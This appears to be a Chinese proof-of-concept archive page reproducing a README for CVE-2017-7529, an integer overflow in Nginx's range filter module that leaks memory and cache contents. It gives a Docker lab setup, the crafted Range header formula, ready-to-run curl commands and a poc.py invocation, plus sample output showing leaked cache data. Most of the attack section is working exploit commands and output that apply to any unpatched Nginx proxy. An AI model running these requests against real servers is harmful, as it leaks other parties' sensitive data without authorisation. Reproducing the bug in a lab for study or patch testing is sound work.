关联漏洞
标题:
F5 Nginx 输入验证错误漏洞
(CVE-2017-7529)
描述:F5 Nginx是美国F5公司的一款轻量级Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like协议下发行。 F5 Nginx 0.5.6版本至1.13.2版本存在输入验证错误漏洞。攻击者利用该漏洞导致敏感信息泄漏。
描述
Nginx (ver. 0.5.6 - 1.13.2) Remote Integer Overflow
介绍
# CVE-2017-7529 Description
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
Source: https://nvd.nist.gov/vuln/detail/CVE-2017-7529
# Nginx + Flask example
In other open sources you may find information that this vulnerability can only be reproduced with Apache2 and only with image files, but this is not the case. This vulnerability works with any application that is proxied through Nginx. The main thing is that the server returns the header ```Accept-Ranges: bytes```. It can be manually added to the nginx configuration: ```proxy_force_ranges on;```
## Installation
```
$ git clone https://github.com/SirEagIe/CVE-2017-7529
$ cd CVE-2017-7529
$ docker build -t cve-2017-7529 .
$ docker run --rm -d -p 8000:80 --name cve-2017-7529 cve-2017-7529
```
# Exploit
Send a GET request to obtain the Content-Length and store the response in the cache.
Resend the request with the Range header with the range ```-n,-(0x8000000000000000-n)```.
```
$ curl -i http://localhost:8000/
$ curl -i http://localhost:8000/ -r -533,-9223372036854775275 --output -
```
Or use poc.py script.
```
$ python3 poc.py http://localhost:8000/ 513
```
Result:
```
[+] Vulnerable to CVE-2017-7529
--00000000000000000029
Content-Type: text/html; charset=utf-8
Content-Range: bytes -513-19/20
MX*fÿÿÿÿÿÿÿÿõU*fTêû©h
KEY: httpGETlocalhost/
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 20
Server: Werkzeug/1.0.1 Python/3.5.3
Date: Thu, 25 Apr 2024 13:09:09 GMT
<p>Hello, World!</p>
--00000000000000000029
Content-Type: text/html; charset=utf-8
Content-Range: bytes -9223372036854775255-19/20
```
文件快照
[4.0K] /data/pocs/b95adc633b2037f993628e4fba69b74b66f15631
├── [ 187] app.py
├── [1.2K] default.conf
├── [ 635] Dockerfile
├── [ 53] entrypoint.sh
├── [ 825] nginx.conf
├── [ 797] poc.py
└── [1.7K] README.md
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。